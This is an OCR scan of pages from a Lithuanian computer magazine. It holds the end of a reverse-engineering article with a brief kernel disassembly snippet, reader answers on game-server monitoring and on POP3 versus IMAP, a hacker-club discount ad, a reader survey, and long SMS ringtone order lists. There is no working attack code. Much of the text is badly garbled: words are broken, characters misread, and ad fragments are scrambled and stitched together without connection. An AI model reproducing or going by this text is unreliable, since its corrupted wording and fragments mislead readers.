Ieškant neplanuotų išėjimų, pakanka pereiti į funkcijos pabaiga 
ir išanalizuoti kryžmines nuorodas, kurios veda aukštyn. Kuo jų 
daugiau, tuo didesnė tikimybė, kad čia kas nors nutiks ne taip. 
O nuo čia jau ir iki saugumo skylės visai netoli. 


Kryžminės nuorodos funkcijos pabaigoje veda link netikėto išėjimo 
kernel: C010A810 oc C010A810: ; CODE XREF: kernel:C01 0A7F1 7 
kernel:C010A810 mov eax, OFFFFFFEAh 

kernel:C010A815 


kemel:C010A815 | loc C010A815: ; CODE XREF: kernel:C010A7CF “ 
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PRIEŠ UŽDUODAMAS KLAUSIMĄ 
PAGALVOK! MAN NEVERTA SIŲSTI 
KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIRTAS 
„HACK-FAG“, TAIP PAT NEVERTA 
UŽDAVINĖTI AKIVAIZDŽIAI LAME- 
RIŠKŲ KLAUSIMŲ, ATSAKYMUS | 
KURIUOS BENT KIEK NORĖDAMAS 
GALI RASTI IR PATS. AŠ NE TELE- 
PATAS, TODĖL KONKRETIZUOK 
KLAUSIMĄ IR ATSIŲSK KUO 
DAUGIAU INFORMACIJOS. 


(0) Mūsų namų lokaliame tinkle tikra šventė: adminas 
paleido dedikuotus serverius iš karto keliems popu- 
liariems žaidimams. Bė abejo, tai nuostabu, tačiau norint 
išsiaiškinti, ar serveryje kas nors žaidžia, ar ne, tenka pa- 
leisti reikiamą žaidimą, o tai labai nepatogu. Galbūt yra 
kokia nors universali priemonė, kuri moka stebėti serve- 
rius, nepaleidžiant pačių žaidimų? 


Aš labai nustebčiau, jeigu tokios priemonės nebūtų. 
Pažangiausiu programiniu sprendimu žaidimo serve- 
rių stebėjime teisėtai laikoma programa HLSW 
(www.hlsw.de). Šis įrankis vartotoju populiarumą uUž- 
kariavo neatsitiktinai: dėl savalaikių atnaujinimų jis moka 
analizuoti absoliučiai visų šiuolaikinių žaidimų serverius. Pa- 
vyzdžiui, tarp jų yra tokios šviežienos, kaip Battlefield2, Ou- 
ake 4, Half Life2. Aš nė nekalbu apie senus gerus Ouake3 
ir Counter-Strike. 
Galbūt tau taip pat patiktų idėja paleisti web serverį, Kuris 
dinamiškai atnaujintų aktyvių serverių statistiką. Tokiu at- 
veju rekomenduočiau pasinaudoti Game Server Monitor 
įskiepiu, kuris skirtas žymiam PHP Nuke (www.phpnuke.org). 


Kuo skiriasi POP ir IMAP protokolai, kuriam iš jų reik- 
tų teikti pirmenybę? Ilgai naudojau POP3, tačiau ne- 
seniai labai įsižeidžiau, kai iš draugo išgirdau, jog tai 
jau atgyvena... 


Galbūt ir aš tave nuliūdinsiu, bet tu iš tiesų atsilikęs 

nuo gyvenimo. IMAP tai tobulesnis pašto protoko 

las, kuriame ištaisyta iš karto keletas gero seno POP3 

trūkumų. Nepaisant vienodos paskirties, POP3 ir IMAP 
naudoja kardinaliai skirtingą veikimo koncepciją. Esmi 
nis skirtumas tame, kad IMAP visus pranešimus saugoja 
serveryje, vartotojui perkeldamas tik antraštes, 0 pagal 
užklausą ir pageidaujamo pranešimo kopiją. POP3 visus 
pranešimus perduoda vartotojui ir pagal nutylėjimą ištri 
na juos iš serverio. Be abejo, POP3 taip pat leidžia sau 
goti pranešimus serveryje ir net prieš pranešimo atsisiun 
timą peržiūrėti jo antraštę, tačiau tai padaryta taip nepa 
togiai, kad tokios galimybės nauda gana abejotina. 
Norint realiai įvertinti IMAP privalumus, pateiksiu porą gy- 
venimiškų pavyzdžių. Pavyzdžiui, man kartais tenka dirbti 
iš karto su keliais kompiuteriais: su naminiu, darbiniu ir 
nešiojamuoju. Savaime suprantama, gana kvaila kiek- 
viename jų įdieginėti pašto klientą. Ir neverta parsisiunti 
nėti pašto į kiekvieną iš jų, kadangi finale gali nutikti taip, 
kad visa korespondencija bus išsisklaidžiusi visose maši- 
nose, todėl reikiamo laiško paieškai gali būti sugaištas 
nepriimtinas laiko kiekis. Naudojantis IMAP protokolu, apie 
tokią problemą galima nė nesusimąstyti. Dar viena pro- 
blema spamas. Parsisiuntinėti šimtus reklaminių laiš- 
ku, kurie kasdien atkeliauja į mūsų redakcijos pašto dė- 
žutes, tikrai užknisa. Kur kas paprasčiau juos atsijoti ser- 
veryje ir tokiais niekais neapkrauti brangaus kanalo. Tie- 
sa, dėl tokio požiūrio atsiranda tam tikrų apribojimų. Dau- 
gelis nemokamų pašto tarnybų negali sau leisti saugoti 
vartotojų korespondencijos, todėl jos priėjimą suteikia Iš 
skirtinai per POP3. Kita vertus, servisas 30gigs.com var- 
totojui suteikia net 30 Gb. Kitaip tariant, kiekviena tai- 
syklė turi savų išimčių. 


Interneto klube „IMPRESS“ 
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MM PRESS 


Kaunas, Savanorių pr. 255, 
(HYPER MAXIMA) 


Pateikus ELITE CLUB 
kortelę visose BMS 
parduotuvėse suteikiama 
5 36 nuolaida. 


ELITE CLUB — 


Elitinio 


HAKERIŲ KLUBO | 


, 
a 


*00464415b 


GOLDEN-MEMBER 


Be; 04106 


||| su ELITE CLUB nario kortele ' 
| suteikiama 20 46 nuolaida! 


taikomos. 


ELITINIS 


HAKERIŲ KLUBAS 


Savanorių pr. 66 
Tel.: (37) 75 10 10 
El. paštas: kaunas(Obms.lt 


BMS MEGAPOLIS, 

Savanorių pr.301 

Tel.: (37) 313101 

El. paštas: megapolisObms.lt 


BMS MEGAPOLIS, 

Laisvės pr. 2 

Tel.: (5) 24 77 300 

El. paštas: v.megapolis(Obms.lt 


Minijos g. 2 
Tel.: (46) 38 33 33 
El. paštas: klaipeda(Obms.lt 


ARIN/ET“T"A Ri. DA 
ANKETA Nr. 32 


Vardas Kitame numeryje norėčiau rasti; Naudojiesi kompiuteriu 
Pavardė č + metus 
Amžius a Naudojiesi internetu 
Adresas Ž „ metus 
Kiek žurnalo numerių skaitei? 
+ numerius 
> Kokią OS naudoji? 
El.paštas a ) 


Tavo klausimas į FAG): 


Išvardink tris, tavo manymu, 
įdomiausius šio numerio straipsnius: 31-0JO NUMERIO 


ž NUGALĖTOJAS: 
DARIUS BAGDONAS 


IŠ TELŠIŲ. 

JAM ATITENKA 

MICROSOFT WIRELESS 
OPTICAL KLAVIATŪRA IR PELĖ 


ir tris prasčiausius: 


LAIMĖTOJO PRAŠOM 
PASKAMBINTI Į REDAKCIJĄ IR 
SUSITARTI DĖL PRIZO 
ATSIĖMIMO. 


BENASSI BROS FEAT. DHANY 


everysiną 


believeinme 


ecsta 


h 


marrakech 


makemeice 


rašyk SMS: exem dragostea | 
SIEMENS telefonams: exems dragostea k X( 
Siųsk numeriu 


Rašyk SMS: oxegame mobilepet Siųsk numeriu kaina: 10 Lt. rašyk SMS: exep dragostea 


siųsk SMS: slųsk SMS 


3100, 3200, 3300, 3510i, 3650, 3660, 5100. 
6100, 6200, 6220, 6610, 6800, 7210, 7250, 72501 
7650, N-gage, N-jage OD 


— 


Motorola V300, V500, V600. Nokia 3100, 3200 
3300, 3510i, 3650, 3660, 5100, 6100, 6220 
6610, 7210, 7250, 7250i, 7650, N-Gage, N- 


„ CX65, M55, MC60, S55, SL55 
SonyEricsson P800, P900, 2600 


siųsk SMS 


Nokia 3100, 3300, 3650, 3660. 5100, 
6200, 6220, 6600, 6610, 6800, 7210, 
72501, 7650, N-Gago 


Rašyk SMS: exea fly 


Rašyk SMS: exe! fly Siųsk numeriu 
Siemens telofonams: oxels fly 


Siųsk numeriu kaina: 


adventas 


Ngiuositavos1 


siųsk SMS 


Nokia 3100, 3200, 3300, 3510i R 
3660, 5100, 5140, 6100, 6200, 6220, 
Gage AD Sharp: GX10, GX20, GX30. Siemens 6610, 6800, 6810, 6820 ' 
Č6š, 7250i, 7650, N-Gage 


kalodos2 


UA ž nokono! | PRTŽS 


kaledos01 kaledos2004 || kaledos 


— L E „= 2- 


haliow formulevianas4 Teuk dalfinas01 


6 Ab aš B 


Jingjang gorila11 drakonai 


vilvLJV OMaGS | de de 9 ie 


mylekites pedos16 | ragana || - 


|| tr | r 


4244 kaiedos19. 


melleslaiskai 


snupis2 „ kaciukas43 forrari 


„a e 2 


= 


tatoo27 suniukas2 
Piėūšė 


56 errania) M 4 KILL ME 


wasssaap uzmusk 


TN 


Kada) 


JT 
A KUTA 24 | RDANGER 


") gimtadienis 


Ja 


vinipuhas 


k HEC ež 6 || WANTED 


spoks011 velnias06 haja | norima 


Rašyk SMS: exei snowm 7 Siųsk numeriu 


- 
- 


xmas29 | xmas9 chillin 


xmas03 


cookie1 candle2 262302 


darklord2 devilish2 


lionroar || | madati 


Spalvoti paveiksliukai, JAVA žaxdimai ir polifoninės mei jos tinka OMNITEL, BITĖS ir £2 (išskyrus 
Nokia 
M55, MC60 


Jippii garantuoja teikiamų paslaugų kokybę. Jei negavote užsakyto turi 


Zpresents 


Maž 


extromo4 


KAUĖDOS) 


Jingle Belis 

We Wish You A Merry Christmas 
Silent Night 

Do They Know It's Christmas 
Oh Christmas Tree 

V Lesu Rodilasi Elochka 

I'm Dreaming Of A White 

Last Christmas 


POPULIARIOS MELODIJOS 


Benassy Bros ft. Dhany / Every 
Crazy Frog / Pump Up The Jam 
Zilvinas Zvagulis / Faina Faina 
Black Eyed Peas / Don't Lie 
Crazy Frog remix 

Haiducil/ Dragostea Din Toi 
Shakira / La Tortura 

Jamos Blunt / You're Beautiju 
Walters 84 Kazha / The War Is Not 
Arash / Boro, Boro 

Akon / Lonely 

Eminem / Mockingbird 

Delta Goodrem f. Brian / Aimosi 
2Pac 6 Elton John / Ghetto Gospe! 
Eminem / Ass Liko Thai 

50 Cent feat. Olivia / Candy Shop 
AC/DC / TNT 

DJ Tiesto / Adagio For Strings 
Rammstein / Du Hast 

Black Eyed Poas / Let's Get lt 


DANCE /ATECHNO 


Tomcraft / Lonelinėss 

2 Unlimited / Get Ready For 
Alcazar / Not A Sinner Nor A 
Agua / Barbie Giri 
Vinylshakerz / One Night In 
Sash! / Ecuador 

Sonigue / Alive 

Bioodhound Gang / The Bad 
Roger Sanchez / Another 
Paul Van Dyk / For An Ange 
Benny Benassi / Satistactior 
ATC /"'m in Heavon 

Cascada / Miracio 

Lou Bega / Mambo No 5 
Alcazar / This Is The Wortd 
Madonna / Music 

Michael Gray / The Weekend 
Bodyrockers /| Liko The Way 
Da Buzz / Alive 

Loona / Baila Mi Ritmo 
Bomfunk MC's / Hypnotic 
Groove Coverage / Moonlight 
Armin Van Buuren / Burned 
lan Van Dahi / Where Are You 
Infernal / From Paris To Bertir 
Jam 8 Spoon ft. Roa / Set Me 
Falthless / Tarantula 

Boney M / Rasputin 

Fatboy Slim / The Joker 

DJ Bobo ft Irene Cara / What 


SAUNIOS MELODIJOS 


Britney Spears / Do Something 
Benassy Bros ft. Dhany / Hit My 
50 Cent / in Da Ciub 

South Park / Uncle Fucka 

50 Cent / PIMP 

Backstroet Boys / Incompiete 
Chemical Brothors / Galvanize 
The Rasmus / In The Shadows 
Rammstein / Amerika 

Gunther / Ding Dong Song 
Alcazar / Physical 

Britney Spears / Everytime 
Vanilla Ninja /1 Know 

Robbie Williams / Radio 
Christina Aguilera / Dirrty 
Scooter / One 

Will Smith / Miami 

The Prodigy I Giris 

Armin Van Buuron / Burned With 
The Rasmus / Guilty 

Jay-Z 8 Linkin Park / Numb 


io ar jo nepavyko atsisiųsti, kreipkitės į mus el. pašto adresu į 


kaina 


(OS MELODIJOS 


TA.T.U. / All Abou 

System Of A Down / B Y 

The Prodigy / Voodoo People 

Black Eyed Peas / My Humos 

HIM I Wings Of A Butterfly 

Sean Paul / We Be Burnės 

Mylo / Doctor Pressure 

Chartotte Church / Call My Nuo 

Leo Ryan / Army ve 

Darren Hayes / Strange 

Mariah Carey / We Belong 

Green Day / Wake Me Up Wiher 
mis / No Feai 

Backstroot Boys / Jus! Want 

Britney Spears / Someday 

Marc Terenzi / 

Gorillaz / Dare 

Simon Webbe / Lay Y 

Kelly Clarkson / Since 

The Pussycat Dolis / (4 

50 Cent / Outta Contro 

Cascada / Evorytimo We 

Bon Jovi / Have A Nice 

Arash / Tempiations 

Daniel Bowter / Bad Day 

Rob Thomas | This Is How A 

Rhianna / Por De Repiay 

S Club 7 / Reach 

Beastio Boys / An Oper 

Kanye West / Gold Digge 


KT VIAEILMU,HITAI 


Misija: Neįmanoma 
Psycho 
Vaiduoklių medžiotojai 


Police Acadomy 
The Good, The Bad And The Ugly 
Seksas Ir miestas 

Beverly Hills 90210 

Žvaigždžių kara 

Ratuotas ritoris 

X-Filos 


James Bond 


Addams Family 
Flinstounai 

Batmanas 

Kill Bill "Twisted Norvo 
20th Century Fox Fantaro 
Rocky 


Austin Powers 
Krikštatėvis 
Benio Hillo Šou "r 


nybil 


Hallowoon balloween 


Mortal Kombat mMortaikos 


Teletabiai 
Brigada br 
Tarzan Yell "mzai 
Drakonų kovos Z 

Nu, Pogodi! nupc 


SAUNIOS MELODIJOS 


todotubbie 


jada 


all 
y 


od 


Scooter / Friends tunas 


Guano Apes / Lords Of nasi 
DJ Tiesto / T 
Moby / Raining Agair air 


aff tri 


T 
11 


pag 


Novaspace / So Lonely sokonely 


The Prodigy / Firestartor 

Europe / The Finai Countdown 

Bomfunk MC's / Freestyter 

Robert Miles / Chuidron 

Depeche Mode / Personal Jesus Ars 


nako 


The Prodigy / Simack My Bitch mackmybėi 


P.Diddy / "Wi Be Missing You 
Aventura / Obsecior 

Anastacia / Sick And Tired 
Gwen Stefani / Rich Gir 

Usher feat. Alicia Keys / My Boo 
Helena Paparizou ! My Number 
Eminem / Stas 

Backstreet Boys || Want It 
Benassi Bros ft. Dhany / H4 My 


Linkin Park I Breaking The Mabit 


ONE 


KAI KITI KOMPIUTERIŲ GAMINTOJAI 
GARANTIJĄ MAZINA -!CG DIDINA 


VISIEMS ICG STAGIONARIEMS 
KOMPIUTERIAMS 


